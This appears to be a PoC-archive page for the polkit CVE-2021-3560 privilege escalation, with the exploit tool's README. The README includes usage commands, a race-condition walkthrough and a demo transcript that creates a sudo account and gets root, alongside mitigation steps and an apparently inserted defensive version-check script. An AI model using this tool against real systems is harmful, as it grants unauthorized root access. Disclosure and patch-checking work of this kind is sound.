Related vulnerability
Title: polkit code issue vulnerability (CVE-2021-3560)
Description: polkit is a component that controls system-wide privileges in Unix-like operating systems. By defining and reviewing authorization rules, it mediates communication between processes of different privilege levels. polkit contains a code issue vulnerability: when the requesting process disconnects from dbus-daemon before polkit_system_bus_name_get_creds_sync is called, polkit cannot obtain that process's unique uid and pid and therefore cannot verify the requesting process's privileges.
Description
Exploit for CVE-2021-3560 Polkit Local Privilege Escalation Vulnerability
Introduction
# CVE-2021-3560 Polkit Local Privilege Escalation
```
.--. .-" "-. .--.
/ .. \/ .-. .-. \/ .. \
| | '| / Y \ |' | |
| \ \ \ 0 | 0 / / / |
\ '- ,\.-"`` ``"-./, -' /
`'-' /_ ^ ^ _\ '-'`
.--'| \._ _./ |'--.
/` \ \ `~` / / `\
/ '._ '---' _.' \
/ '~---~' \
/ \
```
An automated exploit for the **CVE-2021-3560** vulnerability affecting PolicyKit (Polkit) on Linux systems.
> ⚠️ **WARNING**: This tool is intended for educational and cybersecurity training purposes only in a controlled lab environment. Unauthorized use of this exploit on systems you do not own is illegal.
## 📋 Table of Contents
- [About the Vulnerability](#-about-the-vulnerability)
- [Vulnerable Systems](#-vulnerable-systems)
- [Features](#-features)
- [Prerequisites](#-prerequisites)
- [Installation](#-installation)
- [Usage](#-usage)
- [How It Works](#-how-it-works)
- [Demonstration](#-demonstration)
- [Mitigation](#-mitigation)
- [References](#-references)
## 🔍 About the Vulnerability
**CVE-2021-3560** is a local race condition vulnerability in PolicyKit (polkit) that allows an unprivileged user to gain root privileges on vulnerable Linux systems.
### Technical Details
- **CVE ID**: CVE-2021-3560
- **Severity**: High (CVSS 7.8)
- **Type**: Race Condition / Time-of-Check Time-of-Use (TOCTOU)
- **Impact**: Local Privilege Escalation (LPE)
- **Disclosure Date**: June 2021
### Affected Versions
The vulnerability affects two branches of Polkit with different version numbering:
#### Upstream (official versions)
- **Vulnerable**: 0.113 to 0.118
- **Bug introduced**: Commit `bfa5036` (version 0.113)
- **Fixed**: Version 0.119+
#### Debian/Ubuntu fork
- **Vulnerable**: 0.105-26 and higher (up to 0.118)
- **Bug introduced**: Commit `f81d021` (version 0.105-26)
- **NOT vulnerable**: Debian 10 "buster" (0.105-25)
## 💻 Vulnerable Systems
| Distribution | Polkit Version | Vulnerable? |
|---------------------------|-------------------|-------------|
| **Ubuntu 20.04** | 0.105-26ubuntu1 | ✅ Yes |
| Ubuntu 18.04 | 0.105-20 | ❌ No |
| **Debian testing "bullseye"** | 0.105-31+ | ✅ Yes |
| Debian 10 "buster" | 0.105-25 | ❌ No |
| **RHEL 8** | 0.115-11+ | ✅ Yes |
| RHEL 7 | < 0.113 | ❌ No |
| **Fedora 21+** | 0.113+ | ✅ Yes |
| Fedora 20 and earlier | < 0.113 | ❌ No |
> 📝 **Note**: Systems with security patches applied (e.g., ubuntu1.1, deb10u1) are **not** vulnerable.
## ✨ Features
- ✅ **Automatic detection** of vulnerability across multiple distributions
- ✅ **Multi-OS support**: Debian, Ubuntu, RHEL, CentOS, Fedora, Arch Linux
- ✅ **Dependency verification** for required tools
- ✅ **Check mode**: Verify vulnerability without exploitation
- ✅ **Adaptive timing**: Automatic measurement of optimal race condition timing
- ✅ **Progress indicators**: Real-time progress display
- ✅ **Colored output**: Clear and easy-to-read interface
- ✅ **Robust error handling**: Explicit messages on failure
## 📦 Prerequisites
### Python Version
- **Python 3.6+** (compatible with older systems like CentOS 8)
### System Dependencies
The exploit requires the following tools (automatically verified):
- `dbus-send` (to communicate with D-Bus)
- `pkexec` (part of PolicyKit)
- `id` (to verify user creation)
- `openssl` (to generate the password hash)
### Required Service
- `accountsservice` (must be installed and active)
## 🚀 Installation
```bash
# Clone the repository (or download the file)
git clone https://github.com/[your-repo]/CVE-2021-3560_Polkit.git
cd CVE-2021-3560_Polkit
# Make the script executable
chmod +x CVE-2021-3560_Polkit.py
```
## 📖 Usage
### Mode 1: Vulnerability Check (--check)
Check if the system is vulnerable **without** running the exploit:
```bash
python3 CVE-2021-3560_Polkit.py --check
```
**Example output**:
```
[*] ============================================================
[*] CVE-2021-3560 Polkit Vulnerability Checker
[*] ============================================================
[*] Detecting operating system...
[+] OS: Ubuntu 20.04
[*] Checking required dependencies...
[+] Found: dbus-send
[+] Found: pkexec
[+] Found: id
[+] Found: openssl
[*] Detecting Polkit version...
[+] Polkit version: 0.105-26ubuntu1
[+] ============================================================
[+] SYSTEM APPEARS VULNERABLE!
[+] ============================================================
[*] Debian/Ubuntu fork detected (vulnerable since 0.105-26)
```
### Mode 2: Exploitation
Create a privileged user:
```bash
python3 CVE-2021-3560_Polkit.py -u <username> -p <password>
```
**Example**:
```bash
python3 CVE-2021-3560_Polkit.py -u hacker -p Password123!
```
### Complete Options
```
usage: CVE-2021-3560_Polkit.py [-h] [-u USERNAME] [-p PASSWORD] [-c]
options:
-h, --help Show help
-u, --username Username to create
-p, --password Password for new user
-c, --check Check vulnerability without exploiting
```
## ⚙️ How It Works
The exploit abuses a **race condition** in PolicyKit's handling of D-Bus authorization requests.
### Vulnerability Principle
1. **D-Bus Request**: The user sends a D-Bus request to create a user
2. **Authorization Check**: Polkit verifies if the user has permissions
3. **Race Condition**: If the D-Bus connection is closed during verification, Polkit treats the UID as 0 (root)
4. **User Creation**: The user is created with elevated privileges
### Exploit Steps
```
┌─────────────────────────────────────────────────────────┐
│ 1. Optimal timing measurement │
│ └─> Test execution to calibrate timing │
├─────────────────────────────────────────────────────────┤
│ 2. Exploitation: User creation │
│ └─> Send D-Bus CreateUser request │
│ └─> Kill process at precise moment (race condition) │
│ └─> Verify if user created │
├─────────────────────────────────────────────────────────┤
│ 3. Password hash generation │
│ └─> Using openssl passwd -6 │
├─────────────────────────────────────────────────────────┤
│ 4. Exploitation: Password setting │
│ └─> Send D-Bus SetPassword request │
│ └─> Kill process at precise moment (race condition) │
│ └─> Test login with password │
├─────────────────────────────────────────────────────────┤
│ 5. Privilege escalation │
│ └─> Login with created account │
│ └─> Use sudo if member of sudo group │
└─────────────────────────────────────────────────────────┘
```
## 🎬 Demonstration
### Typical Exploitation Scenario
```bash
# 1. Check vulnerability
user@vulnerable:~$ python3 CVE-2021-3560_Polkit.py --check
[+] SYSTEM APPEARS VULNERABLE!
# 2. Launch exploit
user@vulnerable:~$ python3 CVE-2021-3560_Polkit.py -u pwned -p Pwn3d123!
╔═══════════════════════════════════════════════════════════╗
║ CVE-2021-3560 Polkit Privilege Escalation ║
╚═══════════════════════════════════════════════════════════╝
[*] Creating user 'pwned' using race condition timing attack...
[*] Measuring command execution time...
[*] Command takes ~0.045s, using 0.023s timing
[*] Attempting race condition exploit, please wait...
[+] User 'pwned' created successfully! UID: 1001
[*] User is member of groups: 1001(pwned) 27(sudo)
[*] Generating password hash...
[+] Password hash generated
[*] Setting password for user 'pwned'...
[+] Password set successfully!
╔═══════════════════════════════════════════════════════════╗
║ EXPLOIT SUCCESSFUL! ║
╚═══════════════════════════════════════════════════════════╝
[+] User 'pwned' created with password 'Pwn3d123!'
[*] User should be member of 'sudo' group for privilege escalation
[*] Switching to user 'pwned'...
# 3. Get root
pwned@vulnerable:~$ sudo su
root@vulnerable:~# id
uid=0(root) gid=0(root) groups=0(root)
```
## 🛡️ Mitigation
### For System Administrators
1. **Update PolicyKit**:
```bash
# Debian/Ubuntu
sudo apt update && sudo apt upgrade policykit-1
# RHEL/CentOS/Fedora
sudo yum update polkit
# or
sudo dnf update polkit
```
2. **Check version**:
```bash
pkexec --version
# Must be >= 0.119 (upstream) or patched
```
3. **Verify security patches**:
```bash
# Debian/Ubuntu
apt-cache policy policykit-1
# RHEL/CentOS/Fedora
rpm -q --changelog polkit | grep CVE-2021-3560
```
### Minimum Secure Version
- **Upstream**: ≥ 0.119
- **Ubuntu 20.04**: 0.105-26ubuntu1.**1** or higher
- **Debian 11**: 0.105-31+deb11u**1** or higher
- **RHEL 8**: polkit-0.115-11.el8_4.**1** or higher
## 📚 References
### Official Articles and Documentation
- **GitHub Security Lab**: [Privilege escalation with Polkit: How to get root on Linux with a seven-year-old bug](https://github.blog/security/vulnerability-research/privilege-escalation-polkit-root-on-linux-with-bug/)
- **Red Hat CVE**: [CVE-2021-3560](https://access.redhat.com/security/cve/cve-2021-3560)
- **MITRE CVE**: [CVE-2021-3560](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3560)
- **NVD NIST**: [CVE-2021-3560 Detail](https://nvd.nist.gov/vuln/detail/CVE-2021-3560)
### TryHackMe Resources
- **TryHackMe Room**: [Polkit CVE-2021-3560 (Practice)](https://tryhackme.com/room/polkit)
### Patches and Fixes
- **GitLab Polkit**: [Fix commit](https://gitlab.freedesktop.org/polkit/polkit/-/commit/a2bf5c9c83b6ae46cbd5c779d3055bff81ded683)
## 📝 Important Notes
### Success Rate
The exploit relies on a race condition, which means:
- ✅ Generally works in **1-20 attempts**
- ⏱️ Timing is **critical** (automatically calibrated)
- 🔄 Maximum **100 attempts** per step (configurable)
- 📡 Better success rate via **SSH** rather than local console
### Limitations
- ❌ Does **not** work on patched systems
- ❌ Requires **accountsservice** installed and active
- ❌ User must have access to **system D-Bus**
- ❌ Some environments (containers, specific VMs) may block the exploit
### Patched Versions (NOT Vulnerable)
The following versions include security patches and are **NOT vulnerable**:
- `0.105-26ubuntu1.1`, `0.105-26ubuntu1.2`, `0.105-26ubuntu1.3`, etc. (Ubuntu patched)
- `0.105-26ubuntu2.1`, `0.105-26ubuntu2.2`, etc. (Ubuntu patched)
- `0.105-31+deb11u1` (Debian 11 patched)
- `polkit-0.115-11.el8_4.1` (RHEL 8 patched)
**Note**: If your system shows as vulnerable but the exploit fails with `PermissionDenied` errors, it's likely because the version is patched. The exploit will now correctly detect these patched versions.
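As an added defender-side check covering the thresholds given under Affected Versions, Minimum Secure Version and Patched Versions above (example code written for this page, not the exploit project's own script), the following Python classifies a polkit version string as vulnerable, patched, or not affected. The version thresholds and suffix conventions (`ubuntu1.X`, `+deb11u1`, `.el8_4.1`) come from this README; the `classify` and `installed_version` helpers, the `dpkg-query`/`rpm` queries, and the assumption that RHEL 8 builds later than `0.115-11` keep the fix are mine.

```python
import re
import subprocess

# Added example (not part of the exploit project): classify an installed polkit
# version string against the thresholds this README gives. It understands the
# three numbering schemes the README lists: the Debian/Ubuntu 0.105-NN fork,
# upstream 0.1xx versions (Fedora and similar), and RHEL 8 erratum builds.

_VERSION_RE = re.compile(
    r"^(?P<upstream>\d+\.\d+)"   # upstream version, e.g. 0.105 or 0.119
    r"(?:-(?P<rev>\d+))?"        # distro revision, e.g. -26 or -11
    r"(?P<rest>.*)$"             # suffix: ubuntu1.1, +deb11u1, .el8_4.1, or empty
)


def classify(version):
    """Return 'vulnerable', 'patched' or 'not_affected' for a polkit version string."""
    m = _VERSION_RE.match(version.strip())
    if not m:
        raise ValueError("unrecognised polkit version: %r" % version)
    upstream = tuple(int(x) for x in m.group("upstream").split("."))
    rev = int(m.group("rev")) if m.group("rev") else None
    rest = m.group("rest")

    # Debian/Ubuntu fork: upstream 0.105 plus a Debian revision number.
    if upstream == (0, 105) and rev is not None:
        if rev < 26:
            # Debian 10 "buster" 0.105-25 and Ubuntu 18.04 0.105-20 predate the bug.
            return "not_affected"
        # Ubuntu security uploads carry a trailing ".N" with N > 0, e.g. 0.105-26ubuntu1.1
        u = re.match(r"ubuntu\d+\.(\d+)", rest)
        if u and int(u.group(1)) > 0:
            return "patched"
        # Debian stable security uploads carry "+debNuM", e.g. 0.105-31+deb11u1
        if re.search(r"\+deb\d+u\d+", rest):
            return "patched"
        return "vulnerable"

    # Upstream numbering (Fedora, RHEL and others): 0.113 .. 0.118 affected, 0.119+ fixed.
    if upstream < (0, 113):
        return "not_affected"
    if upstream >= (0, 119):
        return "patched"
    # RHEL 8 erratum: polkit-0.115-11.el8_4.1 (or a later build) is patched.
    if upstream == (0, 115) and rev is not None:
        if rev > 11:
            return "patched"  # assumption: later RHEL 8 builds keep the fix
        e = re.match(r"\.el8_(\d+)\.(\d+)", rest)
        if rev == 11 and e and (int(e.group(1)), int(e.group(2))) >= (4, 1):
            return "patched"
    return "vulnerable"


def installed_version():
    """Ask the package manager for the full polkit version string, or None if unknown.

    The package manager reports the complete distro version, including the
    ubuntu1.1 / +deb11u1 / .el8_4.1 suffix that distinguishes a patched build.
    """
    queries = [
        ["dpkg-query", "-W", "--showformat=${Version}", "policykit-1"],
        ["rpm", "-q", "--qf", "%{VERSION}-%{RELEASE}", "polkit"],
    ]
    for cmd in queries:
        try:
            out = subprocess.run(cmd, stdout=subprocess.PIPE, stderr=subprocess.DEVNULL,
                                 check=True, universal_newlines=True).stdout.strip()
        except (OSError, subprocess.CalledProcessError):
            continue
        if out:
            return out
    return None


if __name__ == "__main__":
    v = installed_version()
    if v is None:
        print("[-] could not determine the installed polkit version")
    else:
        print("[*] polkit %s -> %s" % (v, classify(v)))
```

Run it as an unprivileged user on the host being audited; `classify` is pure and can also be fed version strings collected from an inventory system. A "vulnerable" result means the package should be updated as described under Mitigation; "not_affected" builds predate the commit that introduced the bug.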
### Debugging
If the exploit fails:
1. **Check Python version** (if you get `TypeError: __init__() got an unexpected keyword argument 'capture_output'`):
```bash
python3 --version
# Should be 3.6 or higher
# The script is compatible with Python 3.6+
```
2. **Check if version is patched**:
```bash
pkexec --version
# If you see ubuntu1.X (where X > 0), it's patched
```
3. **Check accountsservice**:
```bash
systemctl status accounts-daemon
```
4. **Check D-Bus**:
```bash
dbus-send --system --dest=org.freedesktop.DBus --type=method_call --print-reply /org/freedesktop/DBus org.freedesktop.DBus.ListNames
```
5. **Launch from SSH** rather than local console
6. **Adjust timing** by modifying `optimal_timing` in the code
## 👤 Author
**Seimu**
## 📄 License
This project is intended for educational purposes only. Use of this code for unauthorized activities is strictly prohibited and may result in legal action.
---
> ⚠️ **Disclaimer**: The author is not responsible for any misuse of this tool. Use it only in authorized test environments.
File snapshot
```
[4.0K] /data/pocs/8f685fd763b770cee78f2907ee69e8f323519359
├── [ 18K] CVE-2021-3560_Polkit.py
├── [ 17K] CVE-2021-3560_Polkit.sh
└── [ 13K] README.md
1 directory, 3 files
```
Notes
1. It is recommended to access the PoC through its original source first.
2. If the source is no longer available or cannot be reached, send an e-mail to f.jinxu#gmail.com to request the local snapshot (replace # with @).
3. 神龙 has taken a snapshot of the PoC code for you; to support long-term maintenance, please consider paying for the local PoC. Thank you for your support.